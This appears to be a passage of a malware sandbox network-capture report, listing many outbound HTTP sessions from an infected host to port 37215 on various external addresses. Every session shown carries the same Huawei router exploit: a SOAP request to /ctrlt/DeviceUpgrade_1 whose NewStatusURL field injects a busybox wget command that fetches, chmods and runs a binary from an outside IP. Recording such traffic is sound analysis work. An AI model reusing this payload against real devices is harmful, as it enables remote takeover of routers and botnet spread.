                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1279192.168.2.1555752197.183.34.2437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397553921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1280192.168.2.1549242121.54.167.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397581100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1281192.168.2.1551986122.20.169.4737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397586107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1282192.168.2.1546374197.81.109.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397620916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1283192.168.2.1557562157.115.164.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397622108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1284192.168.2.1538024181.131.4.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397636890 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1285192.168.2.1551560102.74.143.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397658110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1286192.168.2.153585845.41.100.24337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397690058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1287192.168.2.155958245.158.164.837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397691011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1288192.168.2.1540262122.118.67.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397705078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1289192.168.2.1553614197.86.76.15237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397738934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
